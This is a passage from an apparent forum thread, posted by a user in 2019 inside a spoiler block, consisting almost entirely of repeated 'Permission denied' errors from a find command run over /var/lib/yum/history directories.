find: `/var/lib/yum/history/2014-03-25/393': Permission denied
find: `/var/lib/yum/history/2014-03-25/664': Permission denied
find: `/var/lib/yum/history/2014-03-25/452': Permission denied
find: `/var/lib/yum/history/2014-03-25/660': Permission denied
find: `/var/lib/yum/history/2014-03-25/358': Permission denied
find: `/var/lib/yum/history/2014-03-25/182': Permission denied
find: `/var/lib/yum/history/2014-03-25/545': Permission denied
find: `/var/lib/yum/history/2014-03-25/280': Permission denied
find: `/var/lib/yum/history/2014-03-25/297': Permission denied
find: `/var/lib/yum/history/2014-03-25/59': Permission denied
find: `/var/lib/yum/history/2014-03-25/266': Permission denied
find: `/var/lib/yum/history/2014-03-25/430': Permission denied
find: `/var/lib/yum/history/2014-03-25/255': Permission denied
find: `/var/lib/yum/history/2014-03-25/387': Permission denied
find: `/var/lib/yum/history/2014-03-25/66': Permission denied
find: `/var/lib/yum/history/2014-03-25/264': Permission denied
find: `/var/lib/yum/history/2014-03-25/528': Permission denied
find: `/var/lib/yum/history/2014-03-25/559': Permission denied
find: `/var/lib/yum/history/2014-03-25/692': Permission denied
find: `/var/lib/yum/history/2014-03-25/16': Permission denied
find: `/var/lib/yum/history/2014-03-25/493': Permission denied
find: `/var/lib/yum/history/2014-03-25/6': Permission denied
find: `/var/lib/yum/history/2014-03-25/563': Permission denied
find: `/var/lib/yum/history/2014-03-25/121': Permission denied
find: `/var/lib/yum/history/2014-03-25/366': Permission denied
find: `/var/lib/yum/history/2014-03-25/714': Permission denied
find: `/var/lib/yum/history/2014-03-25/186': Permission denied
find: `/var/lib/yum/history/2014-03-25/469': Permission denied
find: `/var/lib/yum/history/2014-03-25/677': Permission denied
find: `/var/lib/yum/history/2014-03-25/263': Permission denied
find: `/var/lib/yum/history/2014-03-25/628': Permission denied
find: `/var/lib/yum/history/2014-03-25/41': Permission denied
find: `/var/lib/yum/history/2014-03-25/688': Permission denied
find: `/var/lib/yum/history/2014-03-25/330': Permission denied
find: `/var/lib/yum/history/2014-03-25/402': Permission denied
find: `/var/lib/yum/history/2014-03-25/203': Permission denied
find: `/var/lib/yum/history/2014-03-25/178': Permission denied
find: `/var/lib/yum/history/2014-03-25/158': Permission denied
find: `/var/lib/yum/history/2014-03-25/377': Permission denied
find: `/var/lib/yum/history/2014-03-25/107': Permission denied
find: `/var/lib/yum/history/2014-03-25/752': Permission denied
find: `/var/lib/yum/history/2014-03-25/486': Permission denied
find: `/var/lib/yum/history/2014-03-25/580': Permission denied
find: `/var/lib/yum/history/2014-03-25/319': Permission denied
find: `/var/lib/yum/history/2014-03-25/667': Permission denied
find: `/var/lib/yum/history/2014-03-25/420': Permission denied
find: `/var/lib/yum/history/2014-03-25/260': Permission denied
find: `/var/lib/yum/history/2014-03-25/624': Permission denied
find: `/var/lib/yum/history/2014-03-25/212': Permission denied
find: `/var/lib/yum/history/2014-03-25/519': Permission denied
find: `/var/lib/yum/history/2014-03-25/418': Permission denied
find: `/var/lib/yum/history/2014-03-25/287': Permission denied
find: `/var/lib/yum/history/2014-03-25/581': Permission denied
find: `/var/lib/yum/history/2014-03-25/68': Permission denied
find: `/var/lib/yum/history/2014-03-25/65': Permission denied
find: `/var/lib/yum/history/2014-03-25/299': Permission denied
find: `/var/lib/yum/history/2014-03-25/531': Permission denied
find: `/var/lib/yum/history/2014-03-25/63': Permission denied
find: `/var/lib/yum/history/2014-03-25/103': Permission denied
find: `/var/lib/yum/history/2014-03-25/57': Permission denied
find: `/var/lib/yum/history/2014-03-25/298': Permission denied
find: `/var/lib/yum/history/2014-03-25/554': Permission denied

BenderMR

02.07.2019, 12:13

.SpoilerTarget" type="button">Spoiler: продолжение 2

Code:
find: `/var/lib/yum/history/2014-03-25/668': Permission denied
find: `/var/lib/yum/history/2014-03-25/754': Permission denied
find: `/var/lib/yum/history/2014-03-25/69': Permission denied
find: `/var/lib/yum/history/2014-03-25/396': Permission denied
find: `/var/lib/yum/history/2014-03-25/308': Permission denied
find: `/var/lib/yum/history/2014-03-25/282': Permission denied
find: `/var/lib/yum/history/2014-03-25/262': Permission denied
find: `/var/lib/yum/history/2014-03-25/590': Permission denied
find: `/var/lib/yum/history/2014-03-25/423': Permission denied
find: `/var/lib/yum/history/2014-03-25/600': Permission denied
find: `/var/lib/yum/history/2014-03-25/244': Permission denied
find: `/var/lib/yum/history/2014-03-25/332': Permission denied
find: `/var/lib/yum/history/2014-03-25/625': Permission denied
find: `/var/lib/yum/history/2014-03-25/223': Permission denied
find: `/var/lib/yum/history/2014-03-25/324': Permission denied
find: `/var/lib/yum/history/2014-03-25/247': Permission denied
find: `/var/lib/yum/history/2014-03-25/502': Permission denied
find: `/var/lib/yum/history/2014-03-25/663': Permission denied
find: `/var/lib/yum/history/2014-03-25/595': Permission denied
find: `/var/lib/yum/history/2014-03-25/84': Permission denied
find: `/var/lib/yum/history/2014-03-25/331': Permission denied
find: `/var/lib/yum/history/2014-03-25/327': Permission denied
find: `/var/lib/yum/history/2014-03-25/111': Permission denied
find: `/var/lib/yum/history/2014-03-25/517': Permission denied
find: `/var/lib/yum/history/2014-03-25/443': Permission denied
find: `/var/lib/yum/history/2014-03-25/574': Permission denied
find: `/var/lib/yum/history/2014-03-25/485': Permission denied
find: `/var/lib/yum/history/2014-03-25/189': Permission denied
find: `/var/lib/yum/history/2014-03-25/544': Permission denied
find: `/var/lib/yum/history/2014-03-25/256': Permission denied
find: `/var/lib/yum/history/2014-03-25/216': Permission denied
find: `/var/lib/yum/history/2014-03-25/487': Permission denied
find: `/var/lib/yum/history/2014-03-25/482': Permission denied
find: `/var/lib/yum/history/2014-03-25/501': Permission denied
find: `/var/lib/yum/history/2014-03-25/589': Permission denied
find: `/var/lib/yum/history/2014-03-25/397': Permission denied
find: `/var/lib/yum/history/2014-03-25/82': Permission denied
find: `/var/lib/yum/history/2014-03-25/251': Permission denied
find: `/var/lib/yum/history/2014-03-25/205': Permission denied
find: `/var/lib/yum/history/2014-03-25/321': Permission denied
find: `/var/lib/yum/history/2014-03-25/606': Permission denied
find: `/var/lib/yum/history/2014-03-25/149': Permission denied
find: `/var/lib/yum/history/2014-03-25/542': Permission denied
find: `/var/lib/yum/history/2014-03-25/604': Permission denied
find: `/var/lib/yum/history/2014-03-25/125': Permission denied
find: `/var/lib/yum/history/2014-03-25/171': Permission denied
find: `/var/lib/yum/history/2014-03-25/322': Permission denied
find: `/var/lib/yum/history/2014-03-25/571': Permission denied
find: `/var/lib/yum/history/2014-03-25/81': Permission denied
find: `/var/lib/yum/history/2014-03-25/195': Permission denied
find: `/var/lib/yum/history/2014-03-25/172': Permission denied
find: `/var/lib/yum/history/2014-03-25/132': Permission denied
find: `/var/lib/yum/history/2014-03-25/642': Permission denied
find: `/var/lib/yum/history/2014-03-25/568': Permission denied
find: `/var/lib/yum/history/2014-03-25/113': Permission denied
find: `/var/lib/yum/history/2014-03-25/484': Permission denied
find: `/var/lib/yum/history/2014-03-25/524': Permission denied
find: `/var/lib/yum/history/2014-03-25/593': Permission denied
find: `/var/lib/yum/history/2014-03-25/599': Permission denied
find: `/var/lib/yum/history/2014-03-25/166': Permission denied
find: `/var/lib/yum/history/2014-03-25/550': Permission denied
find: `/var/lib/yum/history/2014-03-25/578': Permission denied
find: `/var/lib/yum/history/2014-03-25/684': Permission denied
find: `/var/lib/yum/history/2014-03-25/347': Permission denied
find: `/var/lib/yum/history/2014-03-25/119': Permission denied
find: `/var/lib/yum/history/2014-03-25/334': Permission denied
find: `/var/lib/yum/history/2014-03-25/509': Permission denied
find: `/var/lib/yum/history/2014-03-25/650': Permission denied
find: `/var/lib/yum/history/2014-03-25/2': Permission denied
find: `/var/lib/yum/history/2014-03-25/436': Permission denied
find: `/var/lib/yum/history/2014-03-25/30': Permission denied
find: `/var/lib/yum/history/2014-03-25/116': Permission denied
find: `/var/lib/yum/history/2014-03-25/127': Permission denied
find: `/var/lib/yum/history/2014-03-25/415': Permission denied
find: `/var/lib/yum/history/2014-03-25/302': Permission denied
find: `/var/lib/yum/history/2014-03-25/29': Permission denied
find: `/var/lib/yum/history/2014-03-25/142': Permission denied
find: `/var/lib/yum/history/2014-03-25/273': Permission denied
find: `/var/lib/yum/history/2014-03-25/148': Permission denied
find: `/var/lib/yum/history/2014-03-25/444': Permission denied
find: `/var/lib/yum/history/2014-03-25/100': Permission denied
find: `/var/lib/yum/history/2014-03-25/147': Permission denied
find: `/var/lib/yum/history/2014-03-25/210': Permission denied
find: `/var/lib/yum/history/2014-03-25/689': Permission denied
find: `/var/lib/yum/history/2014-03-25/361': Permission denied
find: `/var/lib/yum/history/2014-03-25/227': Permission denied
find: `/var/lib/yum/history/2014-03-25/379': Permission denied
find: `/var/lib/yum/history/2014-03-25/254': Permission denied
find: `/var/lib/yum/history/2014-03-25/504': Permission denied
find: `/var/lib/yum/history/2014-03-25/388': Permission denied
find: `/var/lib/yum/history/2014-03-25/91': Permission denied
find: `/var/lib/yum/history/2014-03-25/681': Permission denied
find: `/var/lib/yum/history/2014-03-25/429': Permission denied
find: `/var/lib/yum/history/2014-03-25/13': Permission denied
find: `/var/lib/yum/history/2014-03-25/555': Permission denied
find: `/var/lib/yum/history/2014-03-25/653': Permission denied
find: `/var/lib/yum/history/2014-03-25/236': Permission denied
find: `/var/lib/yum/history/2014-03-25/575': Permission denied
find: `/var/lib/yum/history/2014-03-25/648': Permission denied
find: `/var/lib/yum/history/2014-03-25/605': Permission denied
find: `/var/lib/yum/history/2014-03-25/196': Permission denied
find: `/var/lib/yum/history/2014-03-25/375': Permission denied
find: `/var/lib/yum/history/2014-03-25/594': Permission denied
find: `/var/lib/yum/history/2014-03-25/353': Permission denied
find: `/var/lib/yum/history/2014-03-25/106': Permission denied
find: `/var/lib/yum/history/2014-03-25/101': Permission denied
find: `/var/lib/yum/history/2014-03-25/561': Permission denied
find: `/var/lib/yum/history/2014-03-25/729': Permission denied
find: `/var/lib/yum/history/2014-03-25/278': Permission denied
find: `/var/lib/yum/history/2014-03-25/346': Permission denied
find: `/var/lib/yum/history/2014-03-25/310': Permission denied
find: `/var/lib/yum/history/2014-03-25/461': Permission denied
find: `/var/lib/yum/history/2014-03-25/328': Permission denied
find: `/var/lib/yum/history/2014-03-25/265': Permission denied
find: `/var/lib/yum/history/2014-03-25/468': Permission denied
find: `/var/lib/yum/history/2014-03-25/494': Permission denied
find: `/var/lib/yum/history/2014-03-25/676': Permission denied
find: `/var/lib/yum/history/2014-03-25/634': Permission denied
find: `/var/lib/yum/history/2014-03-25/552': Permission denied
find: `/var/lib/yum/history/2014-03-25/558': Permission denied
find: `/var/lib/yum/history/2014-03-25/207': Permission denied
find: `/var/lib/yum/history/2014-03-25/231': Permission denied
find: `/var/lib/yum/history/2014-03-25/425': Permission denied
find: `/var/lib/yum/history/2014-03-25/133': Permission denied
find: `/var/lib/yum/history/2014-03-25/718': Permission denied
find: `/var/lib/yum/history/2014-03-25/73': Permission denied
find: `/var/lib/yum/history/2014-03-25/645': Permission denied
find: `/var/lib/yum/history/2014-03-25/477': Permission denied
find: `/var/lib/yum/history/2014-03-25/185': Permission denied
find: `/var/lib/yum/history/2014-03-25/691': Permission denied
find: `/var/lib/yum/history/2014-03-25/737': Permission denied
find: `/var/lib/yum/history/2014-03-25/421': Permission denied
find: `/var/lib/yum/history/2014-03-25/159': Permission denied
find: `/var/lib/yum/history/2014-03-25/515': Permission denied
find: `/var/lib/yum/history/2014-03-25/440': Permission denied
find: `/var/lib/yum/history/2014-03-25/168': Permission denied
find: `/var/lib/yum/history/2014-03-25/21': Permission denied
find: `/var/lib/yum/history/2014-03-25/58': Permission denied
find: `/var/lib/yum/history/2014-03-25/672': Permission denied
find: `/var/lib/yum/history/2014-03-25/305': Permission denied
find: `/var/lib/yum/history/2014-03-25/70': Permission denied
find: `/var/lib/yum/history/2014-03-25/378': Permission denied
find: `/var/lib/yum/history/2014-03-25/290': Permission denied
find: `/var/lib/yum/history/2014-03-25/682': Permission denied
find: `/var/lib/yum/history/2014-03-25/140': Permission denied
find: `/var/lib/yum/history/2014-03-25/507': Permission denied
find: `/var/lib/yum/history/2014-03-25/627': Permission denied
find: `/var/lib/yum/history/2014-03-25/190': Permission denied
find: `/var/lib/yum/history/2014-03-25/435': Permission denied
find: `/var/lib/yum/history/2014-03-25/570': Permission denied
find: `/var/lib/yum/history/2014-03-25/175': Permission denied
find: `/var/lib/yum/history/2014-03-25/156': Permission denied
find: `/var/lib/yum/history/2014-03-25/707': Permission denied
find: `/var/lib/yum/history/2014-03-25/239': Permission denied
find: `/var/lib/yum/history/2014-03-25/458': Permission denied
find: `/var/lib/yum/history/2014-03-25/735': Permission denied
find: `/var/lib/yum/history/2014-03-25/652': Permission denied
find: `/var/lib/yum/history/2014-03-25/743': Permission denied
find: `/var/lib/yum/history/2014-03-25/728': Permission denied
find: `/var/lib/yum/history/2014-03-25/48': Permission denied
find: `/var/lib/yum/history/2014-03-25/727': Permission denied
find: `/var/lib/yum/history/2014-03-25/309': Permission denied
find: `/var/lib/yum/history/2014-03-25/56': Permission denied
find: `/var/lib/yum/history/2014-03-25/344': Permission denied
find: `/var/lib/yum/history/2014-03-25/607': Permission denied
find: `/var/lib/yum/history/2014-03-25/419': Permission denied
find: `/var/lib/yum/history/2014-03-25/214': Permission denied
find: `/var/lib/yum/history/2014-03-25/381': Permission denied
find: `/var/lib/yum/history/2014-03-25/510': Permission denied
find: `/var/lib/yum/history/2014-03-25/105': Permission denied
find: `/var/lib/yum/history/2014-03-25/151': Permission denied
find: `/var/lib/yum/history/2014-03-25/455': Permission denied
find: `/var/lib/yum/history/2014-03-25/224': Permission denied
find: `/var/lib/yum/history/2014-03-25/710': Permission denied
find: `/var/lib/yum/history/2014-03-25/75': Permission denied
find: `/var/lib/yum/history/2014-03-25/114': Permission denied
find: `/var/lib/yum/history/2014-03-25/659': Permission denied
find: `/var/lib/yum/history/2014-03-25/432': Permission denied
find: `/var/lib/yum/history/2014-03-25/480': Permission denied
find: `/var/lib/yum/history/2014-03-25/60': Permission denied
find: `/var/lib/yum/history/2014-03-25/5': Permission denied
find: `/var/lib/yum/history/2014-03-25/704': Permission denied
find: `/var/lib/yum/history/2014-03-25/249': Permission denied
find: `/var/lib/yum/history/2014-03-25/340': Permission denied
find: `/var/lib/yum/history/2014-03-25/449': Permission denied
find: `/var/lib/yum/history/2014-03-25/549': Permission denied
find: `/var/lib/yum/history/2014-03-25/374': Permission denied
find: `/var/lib/yum/history/2014-03-25/673': Permission denied
find: `/var/lib/yum/history/2014-03-25/398': Permission denied
find: `/var/lib/yum/history/2014-03-25/712': Permission denied
find: `/var/lib/yum/history/2014-03-25/179': Permission denied
find: `/var/lib/yum/history/2014-03-25/503': Permission denied
find: `/var/lib/yum/history/2014-03-25/209': Permission denied
find: `/var/lib/yum/history/2014-03-25/62': Permission denied
find: `/var/lib/yum/history/2014-03-25/521': Permission denied
find: `/var/lib/yum/history/2014-03-25/117': Permission denied
find: `/var/lib/yum/history/2014-03-25/596': Permission denied
find: `/var/lib/yum/history/2014-03-25/661': Permission denied
find: `/var/lib/yum/history/2014-03-25/235': Permission denied
find: `/var/lib/yum/history/2014-03-25/541': Permission denied
find: `/var/lib/yum/history/2014-03-25/259': Permission denied
find: `/var/lib/yum/history/2014-03-25/221': Permission denied
find: `/var/lib/yum/history/2014-03-25/442': Permission denied
find: `/var/lib/yum/history/2014-03-25/609': Permission denied
find: `/var/lib/yum/history/2014-03-25/245': Permission denied
find: `/var/lib/yum/history/2014-03-25/638': Permission denied
find: `/var/lib/yum/history/2014-03-25/538': Permission denied
find: `/var/lib/yum/history/2014-03-25/316': Permission denied
find: `/var/lib/yum/history/2014-03-25/181': Permission denied
find: `/var/lib/yum/history/2014-03-25/18': Permission denied
find: `/var/lib/yum/history/2014-03-25/705': Permission denied
find: `/var/lib/yum/history/2014-03-25/318': Permission denied
find: `/var/lib/yum/history/2014-03-25/74': Permission denied
find: `/var/lib/yum/history/2014-03-25/724': Permission denied
find: `/var/lib/yum/history/2014-03-25/474': Permission denied
find: `/var/lib/yum/history/2014-03-25/399': Permission denied
find: `/var/lib/yum/history/2014-03-25/670': Permission denied
find: `/var/lib/yum/history/2014-03-25/702': Permission denied
find: `/var/lib/yum/history/2014-03-25/525': Permission denied
find: `/var/lib/yum/history/2014-03-25/497': Permission denied
find: `/var/lib/yum/history/2014-03-25/326': Permission denied
find: `/var/lib/yum/history/2014-03-25/405': Permission denied
find: `/var/lib/yum/history/2014-03-25/225': Permission denied
find: `/var/lib/yum/history/2014-03-25/741': Permission denied
find: `/var/lib/yum/history/2014-03-25/526': Permission denied
find: `/var/lib/yum/history/2014-03-25/51': Permission denied
find: `/var/lib/yum/history/2014-03-25/546': Permission denied
find: `/var/lib/yum/history/2014-03-25/655': Permission denied
find: `/var/lib/yum/history/2014-03-25/602': Permission denied
find: `/var/lib/yum/history/2014-03-25/417': Permission denied
find: `/var/lib/yum/history/2014-03-25/666': Permission denied
find: `/var/lib/yum/history/2014-03-25/618': Permission denied
find: `/var/lib/yum/history/2014-03-25/500': Permission denied
find: `/var/lib/yum/history/2014-03-25/445': Permission denied
find: `/var/lib/yum/history/2014-03-25/665': Permission denied
find: `/var/lib/yum/history/2014-03-25/725': Permission denied
find: `/var/lib/yum/history/2014-03-25/413': Permission denied
find: `/var/lib/yum/history/2014-03-25/292': Permission denied
find: `/var/lib/yum/history/2014-03-25/447': Permission denied
find: `/var/lib/yum/history/2014-03-25/498': Permission denied
find: `/var/lib/yum/history/2014-03-25/250': Permission denied
find: `/var/lib/yum/history/2014-03-25/98': Permission denied
find: `/var/lib/yum/history/2014-03-25/699': Permission denied
find: `/var/lib/yum/history/2014-03-25/40': Permission denied
find: `/var/lib/yum/history/2014-03-25/122': Permission denied
find: `/var/lib/yum/history/2014-03-25/144': Permission denied
find: `/var/lib/yum/history/2014-03-25/391': Permission denied
find: `/var/lib/yum/history/2014-03-25/373': Permission denied
find: `/var/lib/yum/history/2014-03-25/431': Permission denied
find: `/var/lib/yum/history/2014-03-25/184': Permission denied
find: `/var/lib/yum/history/2014-03-25/118': Permission denied
find: `/var/lib/yum/history/2014-03-25/307': Permission denied
find: `/var/lib/yum/history/2014-03-25/385': Permission denied
find: `/var/lib/yum/history/2014-03-25/738': Permission denied
find: `/var/lib/yum/history/2014-03-25/270': Permission denied
find: `/var/lib/yum/history/2014-03-25/363': Permission denied
find: `/var/lib/yum/history/2014-03-25/407': Permission denied
find: `/var/lib/yum/history/2014-03-25/371': Permission denied
find: `/var/lib/yum/history/2014-03-25/459': Permission denied
find: `/var/lib/yum/history/2014-03-25/566': Permission denied
find: `/var/lib/yum/history/2014-03-25/731': Permission denied
find: `/var/lib/yum/history/2014-03-25/744': Permission denied
find: `/var/lib/yum/history/2014-03-25/588': Permission denied
find: `/var/lib/yum/history/2014-03-25/145': Permission denied
find: `/var/lib/yum/history/2014-03-25/636': Permission denied
find: `/var/lib/yum/history/2014-03-25/351': Permission denied
find: `/var/lib/yum/history/2014-03-25/124': Permission denied
find: `/var/lib/yum/history/2014-03-25/218': Permission denied
find: `/var/lib/yum/history/2014-03-25/412': Permission denied
find: `/var/lib/yum/history/2014-03-25/61': Permission denied
find: `/var/lib/yum/history/2014-03-25/547': Permission denied
find: `/var/lib/yum/history/2014-03-25/261': Permission denied
find: `/var/lib/yum/history/2014-03-25/90': Permission denied
find: `/var/lib/yum/history/2014-03-25/467': Permission denied
find: `/var/lib/yum/history/2014-03-25/496': Permission denied
find: `/var/lib/yum/history/2014-03-25/86': Permission denied
find: `/var/lib/yum/history/2014-03-25/126': Permission denied
find: `/var/lib/yum/history/2014-03-25/372': Permission denied
find: `/var/lib/yum/history/2014-03-25/585': Permission denied
find: `/var/lib/yum/history/2014-03-25/508': Permission denied
find: `/var/lib/yum/history/2014-03-25/409': Permission denied
find: `/var/lib/yum/history/2014-03-25/686': Permission denied
find: `/var/lib/yum/history/2014-03-25/115': Permission denied
find: `/var/lib/yum/history/2014-03-25/77': Permission denied
find: `/var/lib/yum/history/2014-03-25/53': Permission denied
find: `/var/lib/yum/history/2014-03-25/611': Permission denied
find: `/var/lib/yum/history/2014-03-25/301': Permission denied
find: `/var/lib/yum/history/2014-03-25/177': Permission denied
find: `/var/lib/yum/history/2014-03-25/451': Permission denied
find: `/var/lib/yum/history/2014-03-25/83': Permission denied
find: `/var/lib/yum/history/2014-03-25/713': Permission denied
find: `/var/lib/yum/history/2014-03-25/426': Permission denied
find: `/var/lib/yum/history/2014-03-25/532': Permission denied
find: `/var/lib/yum/history/2014-03-25/213': Permission denied
find: `/var/lib/yum/history/2014-03-25/483': Permission denied
find: `/var/lib/yum/history/2014-03-25/206': Permission denied
find: `/var/lib/yum/history/2014-03-25/67': Permission denied
find: `/var/lib/yum/history/2014-03-25/410': Permission denied
find: `/var/lib/yum/history/2014-03-25/76': Permission denied
find: `/var/lib/yum/history/2014-03-25/739': Permission denied
find: `/var/lib/yum/history/2014-03-25/281': Permission denied
find: `/var/lib/yum/history/2014-03-25/139': Permission denied
find: `/var/lib/yum/history/2014-03-25/193': Permission denied
find: `/var/lib/yum/history/2014-03-25/586': Permission denied
find: `/var/lib/yum/history/2014-03-25/87': Permission denied
find: `/var/lib/yum/history/2014-03-25/23': Permission denied
find: `/var/lib/yum/history/2014-03-25/512': Permission denied
find: `/var/lib/yum/history/2014-03-25/751': Permission denied
find: `/var/lib/yum/history/2014-03-25/617': Permission denied
find: `/var/lib/yum/history/2014-03-25/315': Permission denied
find: `/var/lib/yum/history/2014-03-25/229': Permission denied
find: `/var/lib/yum/history/2014-03-25/97': Permission denied
find: `/var/lib/yum/history/2014-03-25/551': Permission denied
find: `/var/lib/yum/history/2014-03-25/392': Permission denied
find: `/var/lib/yum/history/2014-03-25/522': Permission denied
find: `/var/lib/yum/history/2014-03-25/685': Permission denied
find: `/var/lib/yum/history/2014-03-25/597': Permission denied
find: `/var/lib/yum/history/2014-03-25/93': Permission denied
find: `/var/lib/yum/history/2014-03-25/94': Permission denied
find: `/var/lib/yum/history/2014-03-25/441': Permission denied
find: `/var/lib/yum/history/2014-03-25/188': Permission denied
find: `/var/lib/yum/history/2014-03-25/534': Permission denied
find: `/var/lib/yum/history/2014-03-25/226': Permission denied
find: `/var/lib/yum/history/2014-03-25/45': Permission denied
find: `/var/lib/yum/history/2014-03-25/697': Permission denied
find: `/var/lib/yum/history/2014-03-25/711': Permission denied
find: `/var/lib/yum/history/2014-03-25/200': Permission denied
find: `/var/lib/yum/history/2014-03-25/108': Permission denied
find: `/var/lib/yum/history/2014-03-25/715': Permission denied
find: `/var/lib/yum/history/2014-03-25/516': Permission denied
find: `/var/lib/yum/history/2014-03-25/88': Permission denied
find: `/var/lib/yum/history/2014-03-25/99': Permission denied
find: `/var/lib/yum/history/2014-03-25/427': Permission denied
find: `/var/lib/yum/history/2014-03-25/709': Permission denied
find: `/var/lib/yum/history/2014-03-25/336': Permission denied
find: `/var/lib/yum/history/2014-03-25/656': Permission denied
find: `/var/lib/yum/history/2014-03-25/78': Permission denied
find: `/var/lib/yum/history/2014-03-25/394': Permission denied
find: `/var/lib/yum/history/2014-03-25/356': Permission denied
find: `/var/lib/yum/history/2014-03-25/35': Permission denied
find: `/var/lib/yum/history/2014-03-25/450': Permission denied
find: `/var/lib/yum/history/2014-03-25/71': Permission denied
find: `/var/lib/yum/history/2014-03-25/662': Permission denied
find: `/var/lib/yum/history/2014-03-25/365': Permission denied
find: `/var/lib/yum/history/2014-03-25/359': Permission denied
find: `/var/lib/yum/history/2014-03-25/26': Permission denied
find: `/var/lib/yum/history/2014-03-25/238': Permission denied
find: `/var/lib/yum/history/2014-03-25/721': Permission denied
find: `/var/lib/yum/history/2014-03-25/112': Permission denied
find: `/var/lib/yum/history/2014-03-25/383': Permission denied
find: `/var/lib/yum/history/2014-03-25/217': Permission denied
find: `/var/lib/yum/history/2014-03-25/456': Permission denied
find: `/var/lib/yum/history/2014-03-25/146': Permission denied
find: `/var/lib/yum/history/2014-03-25/598': Permission denied
find: `/var/lib/yum/history/2014-03-25/242': Permission denied
find: `/var/lib/yum/history/2014-03-25/414': Permission denied
find: `/var/lib/yum/history/2014-03-25/629': Permission denied
find: `/var/lib/yum/history/2014-03-25/43': Permission denied
find: `/var/lib/yum/history/2014-03-25/401': Permission denied
find: `/var/lib/yum/history/2014-03-25/187': Permission denied
find: `/var/lib/yum/history/2014-03-25/579': Permission denied
find: `/var/lib/yum/history/2014-03-25/164': Permission denied
find: `/var/lib/yum/history/2014-03-25/612': Permission denied
find: `/var/lib/yum/history/2014-03-25/243': Permission denied
find: `/var/lib/yum/history/2014-03-25/258': Permission denied
find: `/var/lib/yum/history/2014-03-25/201': Permission denied
find: `/var/lib/yum/history/2014-03-25/422': Permission denied
find: `/var/lib/yum/history/2014-03-25/370': Permission denied
find: `/var/lib/yum/history/2014-03-25/257': Permission denied
find: `/var/lib/yum/history/2014-03-25/631': Permission denied
find: `/var/lib/yum/history/2014-03-25/52': Permission denied
find: `/var/lib/yum/history/2014-03-25/476': Permission denied
find: `/var/lib/yum/history/2014-03-25/696': Permission denied
find: `/var/lib/yum/history/2014-03-25/8': Permission denied
find: `/var/lib/yum/history/2014-03-25/529': Permission denied
find: `/var/lib/yum/history/2014-03-25/17': Permission denied
find: `/var/lib/yum/history/2014-03-25/109': Permission denied
find: `/var/lib/yum/history/2014-03-25/230': Permission denied
find: `/var/lib/yum/history/2014-03-25/314': Permission denied
find: `/var/lib/yum/history/2014-03-25/495': Permission denied
find: `/var/lib/yum/history/2014-03-25/464': Permission denied
find: `/var/lib/yum/history/2014-03-25/479': Permission denied
find: `/var/lib/yum/history/2014-03-25/556': Permission denied
find: `/var/lib/yum/history/2014-03-25/42': Permission denied
find: `/var/lib/yum/history/2014-03-25/338': Permission denied
find: `/var/lib/yum/history/2014-03-25/622': Permission denied
find: `/var/lib/yum/history/2014-03-25/572': Permission denied
find: `/var/lib/yum/history/2014-03-25/491': Permission denied
find: `/var/lib/yum/history/2014-03-25/577': Permission denied
find: `/var/lib/yum/history/2014-03-25/637': Permission denied
find: `/var/lib/yum/history/2014-03-25/1': Permission denied
find: `/var/lib/yum/history/2014-03-25/475': Permission denied
find: `/var/lib/yum/history/2014-03-25/649': Permission denied
find: `/var/lib/yum/history/2014-03-25/582': Permission denied
find: `/var/lib/yum/history/2014-03-25/620': Permission denied
find: `/var/lib/yum/history/2014-03-25/155': Permission denied
find: `/var/lib/yum/history/2014-03-25/337': Permission denied
find: `/var/lib/yum/history/2014-03-25/584': Permission denied
find: `/var/lib/yum/history/2014-03-25/368': Permission denied
find: `/var/lib/yum/history/2014-03-25/621': Permission denied
find: `/var/lib/yum/history/2014-03-25/505': Permission denied
find: `/var/lib/yum/history/2014-03-25/306': Permission denied
find: `/var/lib/yum/history/2014-03-25/136': Permission denied
find: `/var/lib/yum/history/2014-03-25/14': Permission denied
find: `/var/lib/yum/history/2014-03-25/540': Permission denied
find: `/var/lib/yum/history/2014-03-25/719': Permission denied
find: `/var/lib/yum/history/2014-03-25/730': Permission denied
find: `/var/lib/yum/history/2014-03-25/342': Permission denied
find: `/var/lib/yum/history/2014-03-25/683': Permission denied
find: `/var/lib/yum/history/2014-03-25/92': Permission denied
find: `/var/lib/yum/history/2014-03-25/341': Permission denied
find: `/var/lib/yum/history/2014-03-25/408': Permission denied
find: `/var/lib/yum/history/2014-03-25/274': Permission denied
find: `/var/lib/yum/history/2014-03-25/4': Permission denied
find: `/var/lib/yum/history/2014-03-25/15': Permission denied
find: `/var/lib/yum/history/2014-03-25/583': Permission denied
find: `/var/lib/yum/history/2014-03-25/293': Permission denied
find: `/var/lib/yum/history/2014-03-25/506': Permission denied
find: `/var/lib/yum/history/2014-03-25/573': Permission denied
find: `/var/lib/yum/history/2014-03-25/31': Permission denied
find: `/var/lib/yum/history/2014-03-25/234': Permission denied
find: `/var/lib/yum/history/2014-03-25/165': Permission denied
find: `/var/lib/yum/history/2014-03-25/311': Permission denied
find: `/var/lib/yum/history/2014-03-25/28': Permission denied
find: `/var/lib/yum/history/2014-03-25/635': Permission denied
find: `/var/lib/yum/history/2014-03-25/183': Permission denied
find: `/var/lib/yum/history/2014-03-25/576': Permission denied
find: `/var/lib/yum/history/2014-03-25/615': Permission denied
find: `/var/lib/yum/history/2014-03-25/354': Permission denied
find: `/var/lib/yum/history/2014-03-25/424': Permission denied
find: `/var/lib/yum/history/2014-03-25/7': Permission denied
find: `/var/lib/yum/history/2014-03-25/643': Permission denied
find: `/var/lib/yum/history/2014-03-25/646': Permission denied
find: `/var/lib/yum/history/2014-03-25/27': Permission denied
find: `/var/lib/yum/history/2014-03-25/283': Permission denied
find: `/var/lib/yum/history/2014-03-25/89': Permission denied
find: `/var/lib/yum/history/2014-03-25/466': Permission denied
find: `/var/lib/yum/history/2014-03-25/49': Permission denied
find: `/var/lib/yum/history/2014-03-25/553': Permission denied
find: `/var/lib/yum/history/2014-03-25/303': Permission denied
find: `/var/lib/yum/history/2014-03-25/271': Permission denied
find: `/var/lib/yum/history/2014-03-25/535': Permission denied
find: `/var/lib/yum/history/2014-03-25/150': Permission denied
find: `/var/lib/yum/history/2014-03-25/603': Permission denied
find: `/var/lib/yum/history/2014-03-25/473': Permission denied
find: `/var/lib/yum/history/2014-03-25/488': Permission denied
find: `/var/lib/yum/history/2014-03-25/47': Permission denied
find: `/var/lib/yum/history/2014-03-25/289': Permission denied
find: `/var/lib/yum/history/2014-03-25/428': Permission denied
find: `/var/lib/yum/history/2014-03-25/463': Permission denied
find: `/var/lib/yum/history/2014-03-25/720': Permission denied
find: `/var/lib/yum/history/2014-03-25/32': Permission denied
find: `/var/lib/yum/history/2014-03-25/446': Permission denied
